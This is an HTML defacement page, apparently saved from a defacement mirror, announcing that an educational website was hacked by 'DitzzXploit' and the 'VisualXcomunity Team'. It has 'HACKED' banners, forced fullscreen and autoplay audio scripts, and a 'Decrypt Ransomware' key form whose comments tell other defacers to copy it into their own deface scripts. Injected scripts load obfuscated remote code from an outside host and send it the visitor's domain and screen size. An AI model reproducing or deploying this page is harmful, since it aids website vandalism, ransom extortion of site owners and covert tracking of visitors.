<!--
--  Downloaded from : https://haxor.my.id/save/D0WN37_RANSOMWARE.html
--  Official Web : https://prinsh.com
--  script-deface-generator.prinsh.com
-->

<html>

<head>

<base href="https://bdmch.edu.pk">
  
	 
		
<title>
Null || Vx-VisualXcomunity Team
</title>

		
<meta content="Hacked by D0WN37_R007" name="description">

		
<meta content="Hacked by D0WN37_R007" name="subject">

		
<meta property="og:image" content="https://i.ibb.co/ZNFYYbV/20240131-202705.png">
 
		
<meta property="og:title" content="Hacked by D0WN37_R007">

		
<meta charset="utf-8">

		
<link href="https://fonts.googleapis.com/css?family=Iceberg" rel="stylesheet" type="text/css">

		
<link href="https://fonts.googleapis.com/css?family=Audiowide" rel="stylesheet" type="text/css">
 
		
<link href="https://fonts.googleapis.com/css?family=Merriweather Sans" rel="stylesheet" type="text/css">
 
		
<link href="https://fonts.googleapis.com/css?family=Orbitron" rel="stylesheet" type="text/css">

		
<link href="https://fonts.googleapis.com/css?family=Jura|Black Ops One|Aldrich" rel="stylesheet" type="text/css">
 
		
<link href="https://fonts.googleapis.com/css?family=Inconsolata|Orbitron" rel="stylesheet" type="text/css">
  
		
<link href="https://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css">
 
		
<style type="text/css">
 

   body { 		
   height: 100% 
   width: 100%
   margin: 0;
   padding: 0; 
   background-image: url('');
   background-repeat: no-repeat;
   background-attachment: fixed;
   -webkit-background-size: cover;
   -moz-background-size: cover;
   -o-background-size: cover;
   background-size: cover;
   background-color: #000000;
   background-size: 100%
   background-position: center;
   background-repeat: no-repeat;
   color: #FFFFFF; 		
   	} 	
   
   .whiteglow {
   text-shadow: 0 0 20px #2a6bd5;
   font-weight: bold;
   } 
   
   .cracked {
   font-family: 'Orbitron', sans-serif;
   font-weight: bold;
   text-shadow: 0 0 30px #2a6bd5;
   font-size:60px;
   }
   
   .orange {
   font-family: 'Orbitron', sans-serif;
   font-weight: bold;
   text-shadow: 0 0 30px #00ccff;
   font-size:60px;
   }
   
   .D0WN37_R007 {
   font-family: 'Aldrich', sans-serif;
   font-weight: bold;
   text-shadow: 0 0 30px #00ccff;
   font-size:60px;
   }
   
   .white {
   font-family: 'Orbitron', sans-serif;
   font-weight: bold;
   text-shadow: 0 0 30px #2a6bd5;
   font-size:60px;
   }
   
   .green {
   font-family: 'Orbitron', sans-serif;
   font-weight: bold;
   text-shadow: 0 0 10px #008000;
   font-size:60px;
   }
   
   .cyber {
   font-family: 'Aldrich', sans-serif;
   font-weight: bold;
   text-shadow: 0 0 20px #2a6bd5;
   webkit-filter:url("#glitch");filter:url("#glitch");text-align:center
   font-size:60px;
   }
   
   .CRYPTOJACKERS {
   font-family: 'Aldrich', sans-serif;
   font-weight: bold;
   text-shadow: 0 0 20px #2a6bd5;
   font-size:60px;
   }
   
   .Cjs {
   font-family: 'Orbitron', sans-serif;
   font-weight: bold;
   text-shadow: 0 0 20px #2a6bd5;
   font-size:60px;
   }
   .red {
   font-family: 'Orbitron', sans-serif;
   font-weight: bold;
   text-shadow: 0 0 30px ;
   font-size:60px;
   }
      .redglow {
   text-shadow: 0 0 10px #f90303;

   font-family: "Aldrich"
   
</style>


<script type="text/javascript" async="" src="https://p01.notifa.info/3fsmd3/request?id=1&enc=9UwkxLgY9&params=4TtHaUQnUEiP6KŴfc5C582JQuX3gzRncXrcSYx6PJaqwnFrqLŴbJWAR7S8UrgnPOwKcCpwxealXyan1Ŵb4XHYuiA7nB0Ŵf747D4sEtŴfSLqpMNSLinu7urQL0EŴbaRNFK3PB09lOoapwFHyGNDIWaP4KJw0o70QMKcTgŴfqlQVŴff1BqyvPFz5YO5Ŵfqaz1XJaAp1CSazn1lPp5aGAx3VCk9RQXbTŴfJLoIhVo8ŴbWg71deh9MxfIT7uFLevvmkH5VCwZfsaIXSwŴfURtHlH945NŴbbOqb6SC7E6b2OBLŴbLmW75xG5U2ceYYQzŴbw6MBMw2bID2haŴfwiVhIKvEQ7aEd4HUBŴfZWrzWsŴfyuu5PeGUBJwrW4tbeinR61AfDPPCmkpP3wuXMrV9I1nTsbbDZEmlŴfY0yfŴfOG2fL7t0MpqMPmslsAZ5vTPgVowASiwtiJ9nRP2s25NBv4VfSbSi4JS0ŴfWWF5kDq6uJuZjlubZ5oNEmO0t4QycAoFuvFW2dTaCXnAUNd71l71mPsŴbŴbCc7pPRZxG1H68hnwJ6uUyVwXdRYaZoa8iu2WM02DkXŴbŴfxBmjDGcCKŴf4Pg6GmX5zeaijfPdzdxroa9WK0vhH0e4kŴba9eSH1YXoQdg8nDikEŵd&idc_r=8193385070&domain=mirror-h.org&sw=360&sh=800">

</script>

<script type="text/javascript" src="http://aakashbapna.github.io/jet-planes/doodle.js"></script> 

</head>

   
<body onclick="playAudio();" class="">

   
<script>

    document.addEventListener('click', () =>
 {
        const elem = document.documentElement;
        if (elem.requestFullscreen) {
            elem.requestFullscreen();
        } else if (elem.webkitRequestFullscreen) {
            elem.webkitRequestFullscreen();
        } else if (elem.msRequestFullscreen) {
            elem.msRequestFullscreen();
        }
    });
   
</script>


         
   
<audio id="sec" idm_id="823202817">

   
<source src="https://b.top4top.io/m_2986dli3w0.mp3" type="audio/mpeg">

   
</audio>

   
<script>

   var x = document.getElementById("sec");
   function playAudio() {
    x.play();

        }
      
</script>

      
   
   
   
<div align="center">

   
<span class="orange" style="color:white; font-size: 70pt;">

   
<br>

HACKED


</span>

   
<br>

   
   
<span class="D0WN37_R007" style="color:white; font-size: 20pt;">

✗ BY DitzzXploit ✗
</span>

   
<br>



<br>   
<center>

<img src="https://i.ibb.co/gyS86TJ/Picsart-24-04-06-23-04-59-315.jpg" alt="CRYPTOJACKERS OF INDIA" height="350" width="350">

</center>



   
<svg xmlns="http://www.w3.org/2000/svg" version="1.1">

   
<defs>

   
<filter id="glitch" x="0" y="0">

   
<feColorMatrix in="SourceGraphic" mode="matrix" values="1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 0" result="r">

</feColorMatrix>

   
<feOffset in="r" result="r" dx="-5">

   
<animate attributeName="dx" attributeType="XML" values="0; -5; 0; -18; -2; -4; 0 ;-3; 0" dur="0.2s" repeatCount="indefinite">

</animate>

   
</feOffset>

   
<feColorMatrix in="SourceGraphic" mode="matrix" values="0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 0 0 1 0" result="g">

</feColorMatrix>
l
   
<feOffset in="g" result="g" dx="-5" dy="1">

   
<animate attributeName="dx" attributeType="XML" values="0; 0; 0; -3; 0; 8; 0 ;-1; 0" dur="0.15s" repeatCount="indefinite">

</animate>

   
</feOffset>

   
<feColorMatrix in="SourceGraphic" mode="matrix" values="0 0 0 0 0 0 0 0 0 0 0 0 1 0 0 0 0 0 1 0" result="b">

</feColorMatrix>

   
<feOffset in="b" result="b" dx="5" dy="2">

   
<animate attributeName="dx" attributeType="XML" values="0; 3; -1; 4; 0; 2; 0 ;18; 0" dur="0.35s" repeatCount="indefinite">

</animate>

   
</feOffset>

   
<feBlend in="r" in2="g" mode="screen" result="blend">

</feBlend>

   
<feBlend in="blend" in2="b" mode="screen" result="blend">

</feBlend>

   
</filter>

   
</defs>

   
</svg>

   
   
<script type="text/javascript">
if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url  "p01.notifa.info/3fsmd3/request"   "?id=1"   "&enc=9UwkxLgY9"   "¶ms="   "4TtHaUQnUEiP6KŴfc5C582JQuX3gzRncXrcSYx6PJaqwnFrqLŴbJWAR7S8UrgnPOwKcCpwxealXyan1Ŵb4XHYuiA7nB0Ŵf747D4sEtŴfSLqpMNSLinu7urQL0EŴbaRNFK3PB09lOoapwFHyGNDIWaP4KJw0o70QMKcTgŴfqlQVŴff1BqyvPFz5YO5Ŵfqaz1XJaAp1CSazn1lPp5aGAx3VCk9RQXbTŴfJLoIhVo8ŴbWg71deh9MxfIT7uFLevvmkH5VCwZfsaIXSwŴfURtHlH945NŴbbOqb6SC7E6b2OBLŴbLmW75xG5U2ceYYQzŴbw6MBMw2bID2haŴfwiVhIKvEQ7aEd4HUBŴfZWrzWsŴfyuu5PeGUBJwrW4tbeinR61AfDPPCmkpP3wuXMrV9I1nTsbbDZEmlŴfY0yfŴfOG2fL7t0MpqMPmslsAZ5vTPgVowASiwtiJ9nRP2s25NBv4VfSbSi4JS0ŴfWWF5kDq6uJuZjlubZ5oNEmO0t4QycAoFuvFW2dTaCXnAUNd71l71mPsŴbŴbCc7pPRZxG1H68hnwJ6uUyVwXdRYaZoa8iu2WM02DkXŴbŴfxBmjDGcCKŴf4Pg6GmX5zeaijfPdzdxroa9WK0vhH0e4kŴba9eSH1YXoQdg8nDikEŵd"   "&idc_r=" idc_glo_r   "&domain=" document.domain   "&sw=" screen.width "&sh=" screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};
</script>

   
   
<style>

        @keyframes blink {
            50% {
                opacity: 0;
            }
        }

        .text-blink {
            animation: blink 1s infinite alternate;
        }
   
</style>

<center>
    
<span class="red" style="color:red; font-size: 25pt;">

<span class="text-blink">
    
    
DItzzXploit_RANSOMWARE 

</span>
</span>
<br>
<center>
<span class="redglow" style="font-size: 15pt; ">
<br>
   FEEL THE POWER OF VisualXcomunity Team
<br>
<br>
<br><!--- you MUST add this code to your own deface script for the decryptor later!  -->
<style type='text/css'>
                .inpute {
                    width: 500px;
                    height: 20px;
                    border-color: #EA2A14;
                    background-color: transparent;
                    color: lime;
                    text-align: center;
                }

                .submite {
                    width: 200px;
                    border-color: lime;
                    background-color: transparent;
                    color: lime;
                }
            </style>

<form action="" method="post" style=" text-align: center;">
                <input type="text" name="key" class="inpute" placeholder="Decryption Key" autocomplete="off"><br><br>
                <br>
                <input type="submit" name="submit" class="submite" value="Decrypt Ransomware" />
 </form>
 
 <!-- -->
 
 <!-- Optional! add this in the bottom of your script . 
 after post method, if you refresh the page so it will not loop the encrypt function that cause data corrupt! ---->
   <script>
    if ( window.history.replaceState ) {
        window.history.replaceState( null, null, window.location.href );
    }
</script>
<span class="f0rbidden-ghost" style="color:white; font-size: 10pt; ">
<br>
<span class="orange" style="font-size: 10pt;">
</span>
<br>
</span>
</span>
</span>
</div>
</body>
</html>